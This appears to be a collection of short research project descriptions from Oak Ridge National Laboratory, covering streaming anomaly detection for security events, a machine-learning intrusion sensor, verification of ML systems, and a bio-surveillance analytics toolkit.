Situ combines anomaly detection and data visualization to provide a distributed, streaming platform for discovery and explanation of suspicious behavior to enhance situation awareness.
Security event data, such as intrusion detection system alerts, provide a starting point for analysis, but are information impoverished. To provide context, analysts must manually gather and synthesize relevant data from myriad sources within their enterprise and external to it. Analysts search system logs, network flows, and firewall data; they search IP blacklists and reputation lists, software vulnerability information, malware and threat data, OS and application vendor blogs, and news sites. All of these sources are manually searched for data relevant to the event being investigated. Relevant results must then be brought together and synthesized to put the event in context and make decisions about its importance and impact.
Modern computer network defense systems rely primarily on signature-based intrusion detection tools, which generate alerts when patterns that are pre-determined to be malicious are encountered in network data streams. Signatures are created reactively, and only after manual analysis of a network intrusion. There is no ability to detect intrusions that are new, or variants of an existing attack. There is no ability to adapt the detectors to the patterns unique to a network environment.
The Oak Ridge Cyber Analytics (ORCA) Attack Variant Detector (AVD) is a sensor that uses machine learning technology to analyze behaviors in channels of communication between individual computers. Using examples of attack and non-attack traffic in the target environment, the ORCA sensor is trained to recognize and discriminate between malicious and normal traffic types. The machine learning provides an insight that would be difficult for a human to explicitly code as a signature because it evaluates many interdependent metrics simultaneously.
The Verification, Validation and Uncertainty Quantification (VVUQ) for machine learning project identified processes and techniques to conduct VVUQ on machine learning applications.
ORNL has played a key role in developing novel Big Data toolkits in the context of syndromic disease surveillance. Our platform, the Oak Ridge Bio-surveillance Toolkit (ORBiT) enables large-scale analysis of heterogeneous data sources, including environmental, climate/weather related data, prescriptions records and other novel data streams emerging from social media (e.g., Twitter, Instagram). ORBiT is targeted at developing novel statistical and machine learning tools instead of acting as a central data collection interface from these heterogeneous resources. Additionally, it also provides an application programming interface (API) that can be used by end-users to target specific bio-surveillance applications. Machine learning tools are tightly integrated with visualization tools in a web-based framework to aid the end users or analysts in exploring potential links between heterogeneous data sets, detecting patterns/correlations across multiple data streams, identifying emerging disease outbreaks, forecasting emerging epidemics, and monitoring control strategies. ORBiT is implemented as a component-based, plug-and-play toolkit that exploits existing distributed cloud-based analytics frameworks.